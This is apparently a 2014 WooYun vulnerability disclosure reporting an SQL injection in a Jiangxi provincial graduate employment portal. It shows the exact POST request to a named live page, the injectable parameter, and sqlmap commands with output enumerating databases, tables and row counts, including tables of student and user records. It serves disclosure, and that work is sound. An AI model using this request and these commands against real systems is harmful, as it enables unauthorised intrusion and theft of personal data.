当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049261

漏洞标题:江西省高等院校毕业生就业公共服务平台一处SQL注射漏洞

相关厂商:江西省高等院校毕业生指导服务中心

漏洞作者: m_vptr

提交时间:2014-01-20 14:12

修复时间:2014-03-06 14:12

公开时间:2014-03-06 14:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-20: 细节已通知厂商并且等待厂商处理中
2014-01-25: 厂商已经确认,细节仅向厂商公开
2014-02-04: 细节向核心白帽子及相关领域专家公开
2014-02-14: 细节向普通白帽子公开
2014-02-24: 细节向实习白帽子公开
2014-03-06: 细节向公众公开

简要描述:

SQL注射漏洞

详细说明:

综合信息查询/报道证查询页面post表单,服务端没有对参数进行过滤。
cat cxbdzqk.raw 

POST http://www.jxbys.net.cn/zscx/cxbdzqk.asp HTTP/1.1
Host: www.jxbys.net.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 66
textName=ZAP&selectyear=2012&textXlh=ZAP&Submit=%E6%9F%A5%E8%AF%A2


漏洞证明:


~/Security/sqlmap/sqlmap.py -r cxbdzqk.raw -p textName --dbs
available databases [15]:
[*] CarveOut
[*] Evaluate
[*] jsbm
[*] jxbys_dy
[*] jxbys_web
[*] jyb_agent
[*] master
[*] model
[*] msdb
[*] NewFpb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xue_ji
[*] xx_bys
~/Security/sqlmap/sqlmap.py -r cxbdzqk.raw -p textName --tables -D NewFpb
[21:29:17] [INFO] fetching tables for database: NewFpb
Database: NewFpb
[136 tables]
+-----------------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DIY_TEMPCOMMAND_TABLE |
| Domains |
| DummyTrans |
| ELMAH_Error |
| Nit成绩查询库 |
| Nit网上报名库 |
| Rooms |
| TABLE1 |
| UserAuthorizationTable |
| UserGroupAuthorizationTable |
| UserGroupTable |
| UserList |
| X_4695 |
| X_7911 |
| X_9483 |
| comd_list |
| dtproperties |
| jiaozhu |
| kill_kk |
| menu00 |
| menu_01 |
| menu_02 |
| onlinepoll |
| polloptions |
| t_jiaozhu |
| tbl_BX_信息表 |
| tbl_DY_交流消息表 |
| tbl_DY_信息表 |
| tbl_DY_党费缴纳情况表 |
| tbl_DY_公共信息表 |
| tbl_DY_公共栏目表 |
| tbl_DY_公共留言表 |
| tbl_DY_学生党员工作表 |
| tbl_DY_学生党员流动表 |
| tbl_DY_学生党员用户表 |
| tbl_DY_完整缴费表 |
| tbl_DY_栏目表 |
| tbl_DY_留言表 |
| tbl_DY_系统用户表 |
| tbl_de_公共信息表 |
| tbl_de_公共栏目表 |
| tbl_no_公告信息表 |
| tbl_no_公文信息表 |
| tbl_no_公文阅读信息表 |
| tbl_no_意见反馈表 |
| tbl_no_档案文件信息表 |
| tbl_no_省办信息表 |
| tbl_no_菜单信息表 |
| tbl_no_菜单权限设置表 |
| tbl_no_通讯录信息表 |
| tbl_no_问题类型表 |
| tbl_sc_专题发言表 |
| tbl_企业用户表 |
| tbl_地区信息表 |
| tbl_学生信息表 |
| v_信息表_栏目 |
| vew |
| vw_DY_公共栏目信息表 |
| vw_DY_留言信息表 |
| vw_de_公共栏目信息表 |
| vw_de_公共栏目信息表1 |
| vw_no_公告信息表 |
| vw_no_公告单位信息表 |
| vw_no_公文信息表 |
| vw_no_公文阅读信息表 |
| vw_no_单位树信息表 |
| vw_no_地市_学校单位信息表 |
| vw_no_就业文件柜 |
| vw_no_系统单位信息表 |
| vw_no_通讯录信息表 |
| vw_学校信息表 |
| vw_意见反馈表视图 |
| 专业代码表 |
| 专业信息表 |
| 代码表 |
| 信息表 |
| 公共信息_信息表 |
| 公共信息_栏目权限表 |
| 公共信息_栏目表 |
| 公告栏 |
| 办公文件表 |
| 功能模块权限表 |
| 功能模块表 |
| 单位收藏表 |
| 单位用户表 |
| 友情链接 |
| 学历代码表 |
| 学历层次代码表 |
| 学校代码2005 |
| 学校代码表 |
| 学校信息表 |
| 学校信息表_ |
| 学校用户表 |
| 学生收藏表 |
| 学生用户表 |
| 完整学生表 |
| 完整职位表 |
| 就业咨询表 |
| 就业指导 |
| 就业网用户表 |
| 意向表 |
| 批量招聘表 |
| 批量推荐表 |
| 报到证查询表 |
| 招生热线 |
| 招聘职位表 |
| 政务环境调查表 |
| 政治面貌代码表 |
| 政策法规信息表 |
| 文件表 |
| 栏目表 |
| 校内招聘信息表 |
| 档案管理表 |
| 求职信息表 |
| 洽谈在线表 |
| 洽谈房间表 |
| 洽谈言论表 |
| 用户授权表 |
| 用户组表 |
| 用户表 |
| 留言本_用户表 |
| 留言本_留言表 |
| 留言本_留言表_bk_20090717 |
| 系统用户表 |
| 系统配置表 |
| 统计表 |
| 综合信息 |
| 行政区划代码表 |
| 计数器 |
| 设区市信息表 |
| 设区市用户表 |
| 通讯簿 |
| 院系信息表 |
+-----------------------------+
~/Security/sqlmap/sqlmap.py -r cxbdzqk.raw -p textName -D NewFpb --count
Database: NewFpb
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| dbo.ELMAH_Error | 25608 |
| dbo.UserList | 341 |
| dbo.jiaozhu | 103 |
| dbo.kill_kk | 30 |
| dbo.D99_Tmp | 25 |
| dbo.menu00 | 23 |
| dbo.menu_01 | 18 |
| dbo.Rooms | 10 |
| dbo.menu_02 | 4 |
| dbo.D99_REG | 2 |
| dbo.Domains | 1 |
| dbo.DummyTrans | 1 |
| dbo.X_4695 | 1 |
| dbo.X_7911 | 1 |
| dbo.X_9483 | 1 |
+-----------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 m_vptr@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-01-25 08:37

厂商回复:

最新状态:

暂无